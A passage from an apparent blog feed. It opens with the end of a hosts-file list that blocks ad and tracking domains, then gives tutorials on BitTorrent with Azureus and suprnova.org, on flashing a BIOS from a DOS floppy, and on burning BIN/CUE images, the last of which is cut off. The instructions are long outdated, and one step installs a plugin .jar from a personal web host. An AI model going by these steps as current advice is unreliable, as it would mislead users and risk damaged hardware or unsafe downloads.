127.0.0.1 dcad.tnn.net
127.0.0.1 dclk.net
127.0.0.1 de.rottentomatoes.com
127.0.0.1 dealhelper.com
127.0.0.1 default-homepage-network.com
127.0.0.1 deloo.de
127.0.0.1 desktop.kazaa.com
127.0.0.1 dgm2.com
127.0.0.1 dgmaustralia.com
127.0.0.1 dialerporn.com
127.0.0.1 didtheyreadit.com
127.0.0.1 digits.com
127.0.0.1 direct-revenue.com
127.0.0.1 direct.lbe.ru
127.0.0.1 directleads.com
127.0.0.1 directtrack.com
127.0.0.1 directwebsearch.net
127.0.0.1 discountclick.com
127.0.0.1 divicash.com
127.0.0.1 dnads.directnic.com
127.0.0.1 domainsponsor.com
127.0.0.1 domainsteam.de
127.0.0.1 doubleclic.com
127.0.0.1 doubleclick.com
127.0.0.1 doubleclick.de
127.0.0.1 doubleclick.net
127.0.0.1 drinkmy.com
127.0.0.1 dw.com.com
127.0.0.1 e-bannerx.com
127.0.0.1 e2give.com
127.0.0.1 eadexchange.com
127.0.0.1 eads.com
127.0.0.1 ecoupons.com
127.0.0.1 elitetoplist.com
127.0.0.1 emarketer.com
127.0.0.1 emarketmakers.com
127.0.0.1 engage.everyone.net
127.0.0.1 engage.omaha.com
127.0.0.1 engine.awaps.net
127.0.0.1 engine.espace.netavenir.com
127.0.0.1 enginenetwork.com
127.0.0.1 entercasino.com
127.0.0.1 erotic-ad.com
127.0.0.1 escati.linkopp.net
127.0.0.1 eshopads2.com
127.0.0.1 espotting.com
127.0.0.1 estats.com
127.0.0.1 etracker.de
127.0.0.1 eu-adcenter.net
127.0.0.1 euniverseads.com
127.0.0.1 euro4banner.com
127.0.0.1 europeanbanners.com
127.0.0.1 euros4click.de
127.0.0.1 eusta.de
127.0.0.1 exchange-it.com
127.0.0.1 exchange.bg
127.0.0.1 exchangead.com
127.0.0.1 exchangeclicksonline.com
127.0.0.1 exit76.com
127.0.0.1 exitexchange.com
127.0.0.1 exitfuel.com
127.0.0.1 ext4.price.ru
127.0.0.1 extreme-dm.com
127.0.0.1 eyeblaster-bs.com
127.0.0.1 eyeblaster.com
127.0.0.1 eyewonder.com
127.0.0.1 ezula.com
127.0.0.1 f1organizer.com
127.0.0.1 falkag.de
127.0.0.1 falkag.net
127.0.0.1 fast-adv.it
127.0.0.1 fastclick.com
127.0.0.1 fastclick.com.edgesuite.net
127.0.0.1 fastclick.net
127.0.0.1 fastcounter.bcentral.com
127.0.0.1 feedbackresearch.com
127.0.0.1 ffxcam.fairfax.com.au
127.0.0.1 findcommerce.com
127.0.0.1 findyourcasino.com
127.0.0.1 fineclicks.com
127.0.0.1 first.nova.cz
127.0.0.1 flexbanner.com
127.0.0.1 flowgo.com
127.0.0.1 fmads.osdn.com
127.0.0.1 focalex.com
127.0.0.1 fragmentserv.iac-online.de
127.0.0.1 free-banners.com
127.0.0.1 freebanner.com
127.0.0.1 freelogs.com
127.0.0.1 freestat.pl
127.0.0.1 freestats.com
127.0.0.1 freewebcounter.com
127.0.0.1 *BLEEP*-access.com
127.0.0.1 g-wizzads.net
127.0.0.1 galaxien.com
127.0.0.1 gamblingbanner.com
127.0.0.1 gamehouse.com
127.0.0.1 gator.com
127.0.0.1 gcads.osdn.com
127.0.0.1 gcirm.californianonline.com
127.0.0.1 gemius.pl
127.0.0.1 giftsky.org
127.0.0.1 globaltrack.com
127.0.0.1 go-clicks.de
127.0.0.1 goingplatinum.com
127.0.0.1 gold.weborama.fr
127.0.0.1 goldstats.com
127.0.0.1 googlesyndication.com
127.0.0.1 gorillanation.com
127.0.0.1 gostats.com
127.0.0.1 gp.dejanews.com
127.0.0.1 grafstat.ro
127.0.0.1 herbalaffiliateprogram.com
127.0.0.1 hexusads.fluent.ltd.uk
127.0.0.1 hightrafficads.com
127.0.0.1 hit.bg
127.0.0.1 hit.gemius.pl
127.0.0.1 hit.webcentre.lycos.co.uk
127.0.0.1 hitbox.com
127.0.0.1 hitcents.com
127.0.0.1 hitexchange.net
127.0.0.1 hitfarm.com
127.0.0.1 hitlist.ru
127.0.0.1 hitlogger.com
127.0.0.1 hitlounge.com
127.0.0.1 hitometer.com
127.0.0.1 hits4me.com
127.0.0.1 hitslink.com
127.0.0.1 hotlog.ru
127.0.0.1 hotrank.com.tw
127.0.0.1 hotstatistics.com
127.0.0.1 httpads.com
127.0.0.1 httpool.com
127.0.0.1 humanclick.com
127.0.0.1 hurricanedigitalmedia.com
127.0.0.1 hyperbanner.net
127.0.0.1 hypercount.com
127.0.0.1 i-clicks.net
127.0.0.1 i1img.com
127.0.0.1 iad.liveperson.net
127.0.0.1 iadnet.com
127.0.0.1 idot.cz
127.0.0.1 igads.no.publicus.com
127.0.0.1 ilbanner.com
127.0.0.1 ilead.itrack.it
127.0.0.1 iliillliO00OO0.321.cn
127.0.0.1 image.ugo.com
127.0.0.1 imageads.canoe.ca
127.0.0.1 images.v3.com
127.0.0.1 imaginemedia.com
127.0.0.1 img.bannersxchange.com
127.0.0.1 imonitor.nethost.cz
127.0.0.1 imprese.cz
127.0.0.1 impressionz.co.uk
127.0.0.1 imrworldwide.com
127.0.0.1 inboxdollars.com
127.0.0.1 inc.com
127.0.0.1 indieclick.com
127.0.0.1 industrybrains.com
127.0.0.1 inet-traffic.com
127.0.0.1 infinite-ads.com
127.0.0.1 information.com
127.0.0.1 insightexpress.com
127.0.0.1 instacontent.net
127.0.0.1 instantmadness.com
127.0.0.1 intelliads.com
127.0.0.1 intellitxt.com
127.0.0.1 internet-optimizer.com
127.0.0.1 internetfuel.com
127.0.0.1 interreklame.de
127.0.0.1 ip.ro
127.0.0.1 ireklama.cz
127.0.0.1 is.casalemedia.com
127.0.0.1 itadnetwork.co.uk
127.0.0.1 itbannerexchange.com
127.0.0.1 itfarm.com
127.0.0.1 itop.cz
127.0.0.1 iwin.com
127.0.0.1 j.2004cms.com
127.0.0.1 jbeet.cjt1.net
127.0.0.1 jcontent.bns1.net
127.0.0.1 jcount.com
127.0.0.1 jedonkey.cjt1.net
127.0.0.1 jinisearch.co.uk
127.0.0.1 jkazaa.cjt1.net
127.0.0.1 jnova.cjt1.net
127.0.0.1 joetec.net
127.0.0.1 jokedollars.com
127.0.0.1 justwebads.com
127.0.0.1 kanoodle.com
127.0.0.1 kliks.nl
127.0.0.1 klipads.dvlabs.com
127.0.0.1 kliptracker.com
127.0.0.1 klix.cz
127.0.0.1 labeldaily.com
127.0.0.1 laih.com
127.0.0.1 lbn.ru
127.0.0.1 leadingedgecash.com
127.0.0.1 lightningcast.net
127.0.0.1 lightspeedcash.com
127.0.0.1 link4ads.com
127.0.0.1 linkbuddies.com
127.0.0.1 linkexchange.com
127.0.0.1 linkexchange.ru
127.0.0.1 linkprice.com
127.0.0.1 linkreferral.com
127.0.0.1 linksponsor.com
127.0.0.1 linkswaper.com
127.0.0.1 linksynergy.com
127.0.0.1 liquidad.narrowcastmedia.com
127.0.0.1 lnads.osdn.com
127.0.0.1 log.btopenworld.com
127.0.0.1 log.go.com
127.0.0.1 logging.to
127.0.0.1 logs.erasmas.com
127.0.0.1 look2me.com
127.0.0.1 lop.com
127.0.0.1 lstat.susanin.com
127.0.0.1 m.doubleclick.net
127.0.0.1 mads.gamespot.com
127.0.0.1 mainos2.mtv3.fi
127.0.0.1 marketbanker.com
127.0.0.1 marketing.centrebet.com
127.0.0.1 marketing.nyi.com
127.0.0.1 marketing.nyi.net
127.0.0.1 marketscore.com
127.0.0.1 mastermind.com
127.0.0.1 masterstats.com
127.0.0.1 matchcraft.com
127.0.0.1 maximumcash.com
127.0.0.1 maxserving.com
127.0.0.1 mbuyu.nl
127.0.0.1 media-adrunner.mycomputer.com
127.0.0.1 media-motor.net
127.0.0.1 media.bigstep.com
127.0.0.1 media.ftv-publicite.fr
127.0.0.1 mediacharger.com
127.0.0.1 mediadvertising.ro
127.0.0.1 mediageneral.com
127.0.0.1 mediamgr.ugo.com
127.0.0.1 mediaplazza.com
127.0.0.1 mediaplex.com
127.0.0.1 mediascale.de
127.0.0.1 mediavantage.de
127.0.0.1 megacash.de
127.0.0.1 megago.com
127.0.0.1 megawerbung.de
127.0.0.1 memorix.sdv.fr
127.0.0.1 metaad.econet.hu
127.0.0.1 metrics.webcriteria.net
127.0.0.1 microstatic.pl
127.0.0.1 microticker.com
127.0.0.1 mindseti.com
127.0.0.1 mirror.qkimg.net
127.0.0.1 mjxads.internet.com
127.0.0.1 mkt.cz
127.0.0.1 mojobucks.com
127.0.0.1 monsterpops.com
127.0.0.1 mostcash.com
127.0.0.1 ms-links.com
127.0.0.1 msads.net
127.0.0.1 mtree.com
127.0.0.1 multi1.rmuk.co.uk
127.0.0.1 musiccounter.ru
127.0.0.1 myaffiliateprogram.com
127.0.0.1 mystat.pl
127.0.0.1 mytrix.com
127.0.0.1 n69.com
127.0.0.1 naj.sk
127.0.0.1 navrcholu.cz
127.0.0.1 nedstat.com
127.0.0.1 nedstat.nl
127.0.0.1 nedstatbasic.net
127.0.0.1 netads.hotwired.com
127.0.0.1 netads.sohu.com
127.0.0.1 netdirect.nl
127.0.0.1 netpool.netbookia.net
127.0.0.1 netvertising.be
127.0.0.1 network.realmedia.com
127.0.0.1 new-ads.eurogamer.net
127.0.0.1 newads.cmpnet.com
127.0.0.1 newnet.qsrch.com
127.0.0.1 newtopsites.com
127.0.0.1 ng3.ads.warnerbros.com
127.0.0.1 ngadcenter.net
127.0.0.1 nitroclicks.com
127.0.0.1 nsads.hotwired.com
127.0.0.1 ntbanner.digitalriver.com
127.0.0.1 oas-central.realmedia.com
127.0.0.1 oas.benchmark.fr
127.0.0.1 oas.foxnews.com
127.0.0.1 oas.roanoke.com
127.0.0.1 oas.salon.com
127.0.0.1 oas.signonsandiego.com
127.0.0.1 oas.toronto.com
127.0.0.1 oas.uniontrib.com
127.0.0.1 oas.villagevoice.com
127.0.0.1 oascentral.chicagobusiness.com
127.0.0.1 oascentral.redherring.com
127.0.0.1 oascentral.theonion.com
127.0.0.1 oascentral.thesmokinggun.com
127.0.0.1 oasis.promon.cz
127.0.0.1 observer.cz
127.0.0.1 offeroptimizer.com
127.0.0.1 oneandonlynetwork.com
127.0.0.1 onestat.com
127.0.0.1 onresponse.com
127.0.0.1 openad.infobel.com
127.0.0.1 openad.travelnow.com
127.0.0.1 overpeer.com
127.0.0.1 overpro.com
127.0.0.1 overture.com
127.0.0.1 oxcash.com
127.0.0.1 p5.omaha.com
127.0.0.1 partner-ads.com
127.0.0.1 partner-source.com
127.0.0.1 partner.gonamic.de
127.0.0.1 partner.topcities.com
127.0.0.1 partner2profit.com
127.0.0.1 partnerkonto.de
127.0.0.1 partners.priceline.com
127.0.0.1 partners.starnetsystems.net
127.0.0.1 paycounter.com
127.0.0.1 paypopup.com
127.0.0.1 payserve.com
127.0.0.1 pbnet.ru
127.0.0.1 pcwizz.com
127.0.0.1 pennyweb.com
127.0.0.1 phoenix-adrunner.mycomputer.com
127.0.0.1 phpads.i-merge.net
127.0.0.1 pillscash.com
127.0.0.1 pimproll.com
127.0.0.1 planetactive.com
127.0.0.1 play4traffic.com
127.0.0.1 pointroll.com
127.0.0.1 pops.freeze.com
127.0.0.1 popup.msn.com
127.0.0.1 popupad.net
127.0.0.1 popupmoney.com
127.0.0.1 popupnation.com
127.0.0.1 popups.infostart.com
127.0.0.1 popupsponsor.com
127.0.0.1 popuptraffic.com
127.0.0.1 porntrack.com
127.0.0.1 postmasterbannernet.com
127.0.0.1 precisioncounter.com
127.0.0.1 premium-offers.com
127.0.0.1 premiumcash.de
127.0.0.1 primaryads.com
127.0.0.1 primetime.net
127.0.0.1 pro-advertising.com
127.0.0.1 profero.com
127.0.0.1 professorbanner.com
127.0.0.1 promote.pair.com
127.0.0.1 promozia.de
127.0.0.1 provexia.com
127.0.0.1 psstt.com
127.0.0.1 pub-g.ifrance.com
127.0.0.1 pub.club-internet.fr
127.0.0.1 pub.hardware.fr
127.0.0.1 pub.realmedia.fr
127.0.0.1 publi.grupocorreo.es
127.0.0.1 publi1.grupocorreo.es
127.0.0.1 publi2.grupocorreo.es
127.0.0.1 publiads.com
127.0.0.1 publicidad.elmundo.es
127.0.0.1 publicidad.ya.com
127.0.0.1 pubs.branchez-vous.com
127.0.0.1 pubs.lemonde.fr
127.0.0.1 q.azcentral.com
127.0.0.1 qckjmp.com
127.0.0.1 qksrv.net
127.0.0.1 quarterserver.de
127.0.0.1 questaffiliates.net
127.0.0.1 quinst.com
127.0.0.1 r.hotwired.com
127.0.0.1 r.kde.cz
127.0.0.1 rad.msn.com
127.0.0.1 radiate.com
127.0.0.1 rampidads.com
127.0.0.1 ranking-charts.de
127.0.0.1 ranking-hits.de
127.0.0.1 rankyou.com
127.0.0.1 rate.ru
127.0.0.1 rb1.design.ru
127.0.0.1 realads.realmedia.com
127.0.0.1 realclix.com
127.0.0.1 realmedia-a800.d4p.net
127.0.0.1 realtechnetwork.com
127.0.0.1 realtechnetwork.net
127.0.0.1 realtracker.com
127.0.0.1 redsherriff.com
127.0.0.1 referralware.com
127.0.0.1 regnow.com
127.0.0.1 reklam.rfsl.se
127.0.0.1 reklama.internet.cz
127.0.0.1 reklama.reflektor.cz
127.0.0.1 relmaxtop.com
127.0.0.1 remotead.cnet.com
127.0.0.1 reply.mediatris.net
127.0.0.1 retaildirect.realmedia.com
127.0.0.1 revenue.net
127.0.0.1 rewardster.com
127.0.0.1 richmails.com
127.0.0.1 richwebmaster.com
127.0.0.1 rightmedia.net
127.0.0.1 rightstats.com
127.0.0.1 rl.auto.ru
127.0.0.1 rle.ru
127.0.0.1 rmads.msn.com
127.0.0.1 rmedia.boston.com
127.0.0.1 rnd.yxo.ru
127.0.0.1 roar.com
127.0.0.1 roings.com
127.0.0.1 roosevelt.gjbig.com
127.0.0.1 rose.ixbt.com
127.0.0.1 rotabanner.dni.ru
127.0.0.1 rotabanner.izvestia.ru
127.0.0.1 rotabanner.rian.ru
127.0.0.1 rpts.net
127.0.0.1 ru-traffic.com
127.0.0.1 ru4.com
127.0.0.1 safe-audit.com
127.0.0.1 safelists.com
127.0.0.1 sageanalyst.net
127.0.0.1 searchlocate.com
127.0.0.1 searchramp.com
127.0.0.1 secure.webconnect.net
127.0.0.1 seeq.com
127.0.0.1 seo4india.com
127.0.0.1 separtnership.com
127.0.0.1 serv0.com
127.0.0.1 servads.aip.org
127.0.0.1 servedby.netshelter.net
127.0.0.1 servethis.com
127.0.0.1 serving-sys.com
127.0.0.1 sexcounter.com
127.0.0.1 sexlist.com
127.0.0.1 sextracker.com
127.0.0.1 sfads.osdn.com
127.0.0.1 shareasale.com
127.0.0.1 sher.index.hu
127.0.0.1 shinystat.it
127.0.0.1 siccash.com
127.0.0.1 sidebar.angelfire.com
127.0.0.1 sitemeter.com
127.0.0.1 sma.punto.net
127.0.0.1 smartadserver.com
127.0.0.1 smartclicks.net
127.0.0.1 smartdirect.com
127.0.0.1 smfgroup.cjb.net
127.0.0.1 smile.modchipstore.com
127.0.0.1 sn.baventures.com
127.0.0.1 softclick.com.br
127.0.0.1 software.global-netcom.de
127.0.0.1 softwaresponsor.com
127.0.0.1 specificclick.com
127.0.0.1 specificpop.com
127.0.0.1 spezialreporte.de
127.0.0.1 spinbox.maccentral.com
127.0.0.1 spinbox.net
127.0.0.1 spinbox.techtracker.com
127.0.0.1 spinbox.versiontracker.com
127.0.0.1 sponsor4you.net
127.0.0.1 sponsoradulto.com
127.0.0.1 sponsorpro.de
127.0.0.1 sponsors.thoughtsmedia.com
127.0.0.1 sprinks-clicks.about.com
127.0.0.1 spylog.com
127.0.0.1 spywarelabs.com
127.0.0.1 spywarenuker.com
127.0.0.1 ssads.osdn.com
127.0.0.1 starffa.com
127.0.0.1 start.freeze.com
127.0.0.1 stat.dealtime.com
127.0.0.1 stat.doxod.net
127.0.0.1 stat.pl
127.0.0.1 stat.webmedia.pl
127.0.0.1 stat.zenon.net
127.0.0.1 statcounter.com
127.0.0.1 static.itrack.it
127.0.0.1 static.smni.com
127.0.0.1 staticads.btopenworld.com
127.0.0.1 stats.blogger.com
127.0.0.1 stats.cts-bv.nl
127.0.0.1 stats.darkbluesea.com
127.0.0.1 stats.klsoft.com
127.0.0.1 stats4all.com
127.0.0.1 stop-popup-ads-now.com
127.0.0.1 sugoicounter.com
127.0.0.1 superclix.de
127.0.0.1 superstats.com
127.0.0.1 supertop.ru
127.0.0.1 supertop100.com
127.0.0.1 synergiinteractive.com
127.0.0.1 targad.de
127.0.0.1 targetnet.com
127.0.0.1 targetpoint.com
127.0.0.1 targetsaver.com
127.0.0.1 targetshop.com
127.0.0.1 teknosurf2.com
127.0.0.1 teknosurf3.com
127.0.0.1 test.com
127.0.0.1 textads.biz
127.0.0.1 textads.opera.com
127.0.0.1 textlinks.com
127.0.0.1 tfag.de
127.0.0.1 the-counter.net
127.0.0.1 theanswerto.com
127.0.0.1 thebannerguru.com
127.0.0.1 thecounter.com
127.0.0.1 thevictorynetwork.com
127.0.0.1 thinkingmedia.net
127.0.0.1 thisbanner.com
127.0.0.1 thruport.com
127.0.0.1 tier1network.com
127.0.0.1 tinybar.com
127.0.0.1 tmsads.tribune.com
127.0.0.1 toads.osdn.com
127.0.0.1 toolbar.netscape.com
127.0.0.1 top.list.ru
127.0.0.1 top.one.ru
127.0.0.1 top.proext.com
127.0.0.1 top100-images.rambler.ru
127.0.0.1 top100.mafia.ru
127.0.0.1 top20.com
127.0.0.1 topbarh.box.sk
127.0.0.1 toplist.cz
127.0.0.1 toplista.mw.hu
127.0.0.1 topping.com.ua
127.0.0.1 topprofits.info
127.0.0.1 toprebates.com
127.0.0.1 topsearcher.com
127.0.0.1 topshop-counter.rambler.ru
127.0.0.1 topstats.com
127.0.0.1 topstats.net
127.0.0.1 tps108.org
127.0.0.1 track.freexxxhost.net
127.0.0.1 tracking.frantic.com
127.0.0.1 tracking101.com
127.0.0.1 trackmysales.com
127.0.0.1 tradedoubler.com
127.0.0.1 traffic-exchange.com
127.0.0.1 trafficdiscount.com
127.0.0.1 trafficmp.com
127.0.0.1 trafficswarm.com
127.0.0.1 trafficsyndicate.com
127.0.0.1 traffictrader.net
127.0.0.1 trafficvenue.net
127.0.0.1 trafic.ro
127.0.0.1 traficdublu.ro
127.0.0.1 trafix.sk
127.0.0.1 trakkerd.net
127.0.0.1 trekblue.com
127.0.0.1 trekdata.com
127.0.0.1 tribalfusion.com
127.0.0.1 trix.net
127.0.0.1 truehits.net
127.0.0.1 truehits1.gits.net.th
127.0.0.1 truehits2.gits.net.th
127.0.0.1 tsms-ad.tsms.com
127.0.0.1 ukaffiliates2.com
127.0.0.1 ukbanners.com
127.0.0.1 ultimatecounter.com
127.0.0.1 updated.com
127.0.0.1 us.a1.yimg.com
127.0.0.1 usapromotravel.com
127.0.0.1 usmsad.tom.com
127.0.0.1 utarget.co.uk
127.0.0.1 utils.mediageneral.net
127.0.0.1 valuead.com
127.0.0.1 valueclick.com
127.0.0.1 valueclick.net
127.0.0.1 valuecommerce.com
127.0.0.1 valuesponsor.com
127.0.0.1 vendaregroup.com
127.0.0.1 vericlick.com
127.0.0.1 vg.ad.asap-asp.net
127.0.0.1 vibrantmedia.com
127.0.0.1 view4cash.de
127.0.0.1 viewpoint.com
127.0.0.1 vortextraffic.com
127.0.0.1 vx2.cc
127.0.0.1 w3exit.com
127.0.0.1 wannaclick.com
127.0.0.1 web-stat.com
127.0.0.1 web2.deja.com
127.0.0.1 webads.bizservers.com
127.0.0.1 webads.co.nz
127.0.0.1 webads.nl
127.0.0.1 webangel.ru
127.0.0.1 webcash.nl
127.0.0.1 webcounter.cz
127.0.0.1 webcounter.goweb.de
127.0.0.1 webmasterplan.com
127.0.0.1 webpdp.gator.com
127.0.0.1 webpower.com
127.0.0.1 websitefreepromotions.com
127.0.0.1 websponsors.com
127.0.0.1 webstars2000.com
127.0.0.1 webstat.com
127.0.0.1 webstat.net
127.0.0.1 webtraxx.de
127.0.0.1 webtrendslive.com
127.0.0.1 wegcash.com
127.0.0.1 wenksdisdkjeilsow.com
127.0.0.1 whenu.com
127.0.0.1 whispa.com
127.0.0.1 window.nixnet.cz
127.0.0.1 windupdates.com
127.0.0.1 wipub.com
127.0.0.1 worldbe.com
127.0.0.1 wtlive.com
127.0.0.1 wustat.windows.com
127.0.0.1 www-banner.chat.ru
127.0.0.1 www.adsxchange.lv
127.0.0.1 www.banner-link.com.br
127.0.0.1 www.dnps.com
127.0.0.1 www.kaplanindex.com
127.0.0.1 www.money4exit.de
127.0.0.1 www.photo-ads.co.uk
127.0.0.1 www.sponsor2002.de
127.0.0.1 x.mycity.com
127.0.0.1 xchange.ro
127.0.0.1 xiti.com
127.0.0.1 xq1.net
127.0.0.1 xtrocash.org
127.0.0.1 xxxcounter.com
127.0.0.1 xxxtoolbar.com
127.0.0.1 xzoomy.com
127.0.0.1 y.ibsys.com
127.0.0.1 yesadvertising.com
127.0.0.1 youclick2earn.com
127.0.0.1 z.times.lv
127.0.0.1 zanox-affiliate.de
127.0.0.1 zanox.com
127.0.0.1 zeads.com
127.0.0.1 zedo.com
127.0.0.1 zencudo.co.uk
127.0.0.1 zi.r.tv.com
127.0.0.1 zmedia.com

Bit Torrent Tutorials

noreply@blogger.com (Agung Prasetiawan,) — Fri, 30 Dec 2016 07:30:00 +0000

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

BIOS Update Procedure

noreply@blogger.com (Agung Prasetiawan,) — Thu, 29 Dec 2016 07:29:00 +0000

BIOS Update Procedure

All latest Motherboards today, 486/ Pentium / Pentium Pro etc.,ensure that upgrades are easily obtained by incorporating the system BIOS in a FLASH Memory component. With FLASH BIOS, there is no need to replace an EPROM component. Once downloaded, the upgrade utility fits on a floppy disc allowing the user to save, verify and update the system BIOS. A hard drive or a network drive can also be used to run the newer upgrade utilities. However, memory managers can not be installed while upgrading.

Most pre-Pentium motherboards do not have a Flash BIOS. The following instructions therefore do not apply to these boards. If your motherboard does not have a Flash BIOS (EEPROM) you will need to use an EPROM programmer to re-program the BIOS chip. See your dealer for more information about this.

Please read the following instructions in full before starting a Flash BIOS upgrade:
A. Create a Bootable Floppy (in DOS)

With a non-formatted disk, type the following:

format a:/s

If using a formatted disk, type:

sys a:

This procedure will ensure a clean boot when you are flashing the new BIOS.

B. Download the BIOS file

Download the correct BIOS file by clicking on the file name of the BIOS file you wish to download.

Save the BIOS file and the Flash Utility file in the boot disk you have created. Unzip the BIOS file and the flash utility file. If you don't have an "unzip" utility, download the WinZip for Windows 95 shareware/ evaluation copy for that one time use from _www.winzip.com or _www.pkware.com. Most CD ROMs found in computer magazines, have a shareware version of WinZip on them.

You should have extracted two files:

Flash BIOS utility eg: flash7265.exe (for example)

BIOS eg: 6152J900.bin (example)

Use the latest flash utility available unless otherwise specified (either on the BIOS update page or in the archive file). This information is usually provided.

C. Upgrade the System BIOS

During boot up, write down the old BIOS version because you will need to use it for the BIOS backup file name.

Place the bootable floppy disk containing the BIOS file and the Flash Utility in drive a, and reboot the system in MS-DOS, preferably Version 6.22

At the A:> prompt, type the corresponding Flash BIOS utility and the BIOS file with its extension.

For example:

flash625 615j900.bin

From the Flash Memory Writer menu, select "Y" to "Do you want to save BIOS?" if you want to save (back up) your current BIOS (strongly recommended), then type the name of your current BIOS and its extension after FILE NAME TO SAVE: eg: a:\613J900.bin

Alternatively select "N" if you don't want to save your current BIOS. Beware, though, that you won't be able to recover from a possible failure.

Select "Y" to "Are you sure to program?"

Wait until it displays "Message: Power Off or Reset the system"

Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system. If you write to BIOS but cannot complete the procedure, do not switch off, because the computer will not be able to boo, and you will not be given another chance to flash. In this case leave your system on until you resolve the problem (flashing BIOS with old file is a possible solution, provided you've made a backup before)

Make sure the new BIOS version has been loaded properly by taking note of the BIOS identifier as the system is rebooting.

For AMI BIOS
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system holding the "END" key prior to power on until you enter CMOS setup. If you do not do this the first time booting up after upgrading the BIOS, the system will hang.

BIOS Update Tips
note:
1.Make sure never to turn off or reset your computer during the flash process. This will corrupt the BIOS data. We also recommend that you make a copy of your current BIOS on the bootable floppy so you can reflash it if you need to. (This option is not available when flashing an AMI BIOS).

2. If you have problems installing your new BIOS please check the following:

Have you done a clean boot?
In other words, did you follow the above procedure for making a bootable floppy? This ensures that when booting from "A" there are no device drivers on the diskette. Failing to do a clean boot is the most common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS.

If you have not used a bootable floppy, insure a clean boot either by

a) pressing F5 during bootup

b) by removing all device drivers on the CONFIG.SYS including the HIMEM.SYS. Do this by using the EDIT command.

Have you booted up under DOS?
Booting in Windows is another common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS. Make sure to boot up to DOS with a minimum set of drivers. Important: Booting in DOS does not mean selecting "Restart computer in MS-DOS Mode" from Windows98/95 shutdown menu or going to Prompt mode in WindowsNT, but rather following the above procedure (format a: /s and rebooting from a:\).

Have you entered the full file name of the flash utility and the BIOS plus its extension?
Do not forget that often you will need to add a drive letter (a:\) before flashing the BIOS. Example: when asked for file name of new BIOS file which is on your floppy disk, in case you're working from c:\ your will need to type a:\615j900.bin, rather than 615j900.bin only.

BIN & .CUE simple tutorial

noreply@blogger.com (Agung Prasetiawan,) — Wed, 28 Dec 2016 07:26:00 +0000

BIN & .CUE simple tutorial.

There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.

So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.

BURN TO CD

You will need either NERO, CDRWIN or FIREBURNER to burn the file.

To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up, for anything other than music make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.

To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.

To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and chooseselect "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.

.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:

